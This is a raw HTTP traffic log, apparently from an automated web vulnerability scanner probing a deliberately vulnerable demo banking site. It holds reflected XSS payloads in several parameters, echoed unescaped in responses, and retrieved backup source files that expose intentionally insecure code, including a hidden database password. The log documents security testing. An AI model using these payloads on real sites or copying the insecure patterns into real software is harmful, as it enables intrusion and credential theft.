HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:36 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4013 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /include/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:25:10 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 48 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect cboPage=</textarea><script>alert('XSS')</script>
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:38:18 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 975 Content-Type: text/html Cache-control: private <html> <body> A user should never see this text<br> this page is a redirect only page. The page that the user selected was </textarea><script>alert('XSS')</script><br> Page was looking for a value in parameter called cboPage<br><br> <h2>What follows is a dump of the HTTP stuff</h2> <b>Form Variables Passed:</b><br>cboPage= </textarea><script>alert('XSS')</script><br> <b>QueryString variables passed:</b><br><pre>****** Head Data*** Client IP:199.72.29.34 Connection: Close Host: zero.webappsecurity.com Referer: http://zero.webappsecurity.com:80/pindex.asp User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect Content-Length: 48 Content-Type: application/x-www-form-urlencoded ****** End of Head Data*******</pre><br> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:49 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 3974 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /cgi-bin/mailfile.cgi HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:41:59 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:02 GMT ETag: "b4c3f1f8a9dc11:8f6" Content-Length: 12 MAILFILE.CGI
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=>"><script>alert("XSS")</script> HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:32 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 3982 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>>"><script>alert("XSS")</script></center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /login.asp.bak HTTP/1.0 Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:51:33 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 05:45:31 GMT ETag: "96256f86badc11:8f6" Content-Length: 14611 <% dim sName, sPassPhrase sName=Request("txtName") sPassPhrase=Request("txtPassPhrase") %> <html> <body> <% if lcase(sName)="root" then Response.Write "Hello " & sName & "<br>Welcome back" elseif lcase(sName)="/etc/passwd" then Response.Write "root:x:0:0::/root:/bin/sh" Response.Write "dsmith:x:516:522::/home/dsmith:/bin/false" Response.Write "etaylor:x:517:523::/home/etaylor:/bin/false" Response.Write "scooby:x:518:524::/home/scooby-doo:/bin/false" Response.Write "pshaggy:x:519:526::/home/pshaggy:/bin/false" Response.Write "dtomson:x:520:527::/home/dtomson:/bin/false" Response.Write "jsmith:x:521:528::/home/jsmith:/bin/false" elseif lcase(sName)="/boot.ini" then Response.Write "[boot loader]" Response.Write "timeout=30" Response.Write "default=multi(0)disk(0)rdisk(0)partition(3)\WINNT" Response.Write "[operating systems]" Response.Write "multi(0)disk(0)rdisk(0)partition(3)\WINNT=""Microsoft Windows 2000 Server"" /fastdetect" Response.Write "multi(0)disk(0)rdisk(0)partition(2)\WINNT=""Microsoft Windows 2000 Professional"" /fastdetect" elseif lcase(sName)="*" then Response.Write "An error has occurred" elseif lcase(sName)=";" then Response.Write "NON-HTML ERROR" else Response.Write " <TABLE BGCOLOR='#ffffff' STYLE='border: 3px solid black'> " Response.Write " <TR> " Response.Write " <TD " Response.Write " STYLE='border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3' " Response.Write " HEIGHT='47' ROWSPAN='2' VALIGN='TOP'><IMG " Response.Write " SRC='/images/freebank-logo2.gif' ALIGN='LEFT' BORDER='0' WIDTH='150' " Response.Write " HEIGHT='50'><BR><BR></TD> " Response.Write " <TD STYLE='border-top: 7px solid #2E7AA3' WIDTH='571' HEIGHT='47' " Response.Write " VALIGN='TOP'>&nbsp;</TD> " Response.Write " </TR> " Response.Write " <TR> " Response.Write " <TD WIDTH='571' VALIGN='TOP' ROWSPAN='7' HEIGHT='49'> " Response.Write " <TABLE> " Response.Write " <TR> " Response.Write " <TD BGCOLOR='#2E7AA3' STYLE='border: 1px solid black' WIDTH='258' " Response.Write " HEIGHT='217'> " Response.Write " <FORM ACTION='login.asp' METHOD='post'> " Response.Write " <CENTER>Invalid Login: " & sName & "<br>Please try again<br>" & "Username:<BR><INPUT TYPE='text' NAME='txtName' " Response.Write " STYLE='border: 1px solid black; spacing: 0'><BR>Password:<BR><INPUT TYPE='password' " Response.Write " NAME='txtPassPhrase' STYLE='border: 1px solid black; spacing: 0'><BR><INPUT " Response.Write " TYPE='radio' NAME='graphicOption' VALUE='minimum' CHECKED='CHECKED'><FONT " Response.Write " SIZE='-1'>Minimum Graphics</FONT><BR><INPUT TYPE='radio' NAME='graphicOption' " Response.Write " VALUE='standard'><FONT SIZE='-1'>Standard Graphics</FONT><BR><BR><INPUT " Response.Write " TYPE='submit' STYLE='border: 1px solid black' " Response.Write " VALUE=' Access Accounts '><BR></CENTER></FORM></TD> " Response.Write " <TD STYLE='border: 1px solid black' WIDTH='304' HEIGHT='217' " Response.Write " ROWSPAN='2'><IMG SRC='/images/lock.gif' WIDTH='304' HEIGHT='266' " Response.Write " BORDER='0'></TD> " Response.Write " </TR> " Response.Write " <TR> " Response.Write " <TD BGCOLOR='ffffff' STYLE='border: 1px solid black' WIDTH='258' HEIGHT='241' " Response.Write " VALIGN='TOP'><FONT SIZE='-2'>We are confident of our system's ability to " Response.Write " protect all transactions; however, this is not an invitation for people to " Response.Write " attempt unauthorized access to the system. This is a private computing system " Response.Write " which is restricted to authorized individuals. Actual or attempted unauthorized " Response.Write " use of this computer system may result in criminal and/or civil prosecution. We " Response.Write " reserve the right to view, monitor, and record activity on the system without " Response.Write " notice or permission. Any information obtained by monitoring, reviewing, or " Response.Write " recording is subject to review by law enforcement organizations in connection " Response.Write " with the investigation or prosecution of possible criminal activity on the " Response.Write " system. If you are not an authorized user of this system or do not consent to " Response.Write " continued monitoring, exit the system at this time. </FONT></TD> " Response.Write " </TR> " Response.Write " </TABLE></TD> " Response.Write " </TR> " Response.Write " <TR> " Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162'><IMG " Response.Write " SRC='/images/customer-login.gif' ALIGN='LEFT' HEIGHT='20' " Response.Write " BORDER='0'></TD> " Response.Write " </TR> " Response.Write " <TR> " Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162'><A " Response.Write " HREF='/pindex.asp'><IMG SRC='/images/financial-planning.gif' ALIGN='LEFT' " Response.Write " BORDER='0' WIDTH='150' HEIGHT='20'></A></TD> " Response.Write " </TR> " Response.Write " <TR> " Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162' " Response.Write " HEIGHT='19'><IMG SRC='/images/services.gif' ALIGN='LEFT' HEIGHT='20' " Response.Write " BORDER='0'></TD> " Response.Write " </TR> " Response.Write " <TR> " Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162' " Response.Write " HEIGHT='24'><IMG SRC='/images/your-accounts.gif' ALIGN='LEFT' HEIGHT='20' " Response.Write " BORDER='0'></TD> " Response.Write " </TR> " Response.Write " <TR> " Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162'><IMG " Response.Write " SRC='/images/customer-support.gif' ALIGN='LEFT' HEIGHT='20' " Response.Write " BORDER='0'></TD> " Response.Write " </TR> " Response.Write " <TR> " Response.Write " <TD STYLE='border-left: 12px solid #2E7AA3' WIDTH='162' " Response.Write " ALIGN='CENTER'>&nbsp; " Response.Write " <FORM ACTION='pformresults.asp' METHOD='post'> " Response.Write " <P><FONT SIZE='-1' FACE='Arial'> Register for an Interest Checking " Response.Write " Account with FreeBank:</FONT></P> " Response.Write " <P><FONT SIZE='-1' FACE='Arial'>First Name:</FONT><INPUT " Response.Write " TYPE='text' NAME='txtFirstName' " Response.Write " STYLE='border: 1px solid black; spacing: 0'><BR><FONT SIZE='-1' " Response.Write " FACE='Arial'>Last Name:</FONT><INPUT TYPE='text' NAME='txtLastName' " Response.Write " STYLE='border: 1px solid black; spacing: 0'><BR> " Response.Write " <INPUT TYPE='hidden' NAME='txtHidden' VALUE='This was hidden from the user'> " Response.Write " <INPUT TYPE='hidden' NAME='dbConnectString' " Response.Write " VALUE='dbCCNumbers;uid=sa;password=scoobydo'> " Response.Write " <INPUT TYPE='submit' STYLE='border: 1px solid black' " Response.Write " VALUE='Register'></P></FORM></TD> " Response.Write " </TR> " Response.Write " </TABLE> " ' " end if %> </body> </html>
GET /admin/help.cgi.bak HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:35:16 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:46:59 GMT ETag: "744b74f7a9dc11:8f6" Content-Length: 31 <HTML></HTML>bleh exploit :0:0:
POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 61 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect cboPage=1"style="background:url(javascript:alert('XSS'))"%20"
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:38:18 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 997 Content-Type: text/html Cache-control: private <html> <body> A user should never see this text<br> this page is a redirect only page. The page that the user selected was 1"style="background:url(javascript:alert('XSS'))" "<br> Page was looking for a value in parameter called cboPage<br><br> <h2>What follows is a dump of the HTTP stuff</h2> <b>Form Variables Passed:</b><br>cboPage= 1"style="background:url(javascript:alert('XSS'))" "<br> <b>QueryString variables passed:</b><br><pre>****** Head Data*** Client IP:199.72.29.34 Connection: Close Host: zero.webappsecurity.com Referer: http://zero.webappsecurity.com:80/pindex.asp User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect Content-Length: 61 Content-Type: application/x-www-form-urlencoded ****** End of Head Data*******</pre><br> </body> </html>
GET /plink.asp?a=>"'><img%20src="javascript:alert('XSS')">&c=12 HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:36:57 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 205 Content-Type: text/html Cache-control: private <html> <body> <P>The parameter "a" = >"'><img src="javascript:alert('XSS')"></P> <P>The parameter "c" = 12</P><br> <a href="pindex.asp">Click here to return to index</a> </body> </html>
GET /user/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:25:37 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /test/test.html HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:42:07 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:06 GMT ETag: "d81a92fba9dc11:8f6" Content-Length: 296 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title> The Test Page </title> </head> <body> <p> LOGIC CHECKS WORKED </p> <A href="..\images\hi.asp">The welcome page</A><br> <br> <A href="..\errors\errors.log">Error logs</A> </body> </html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:31 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
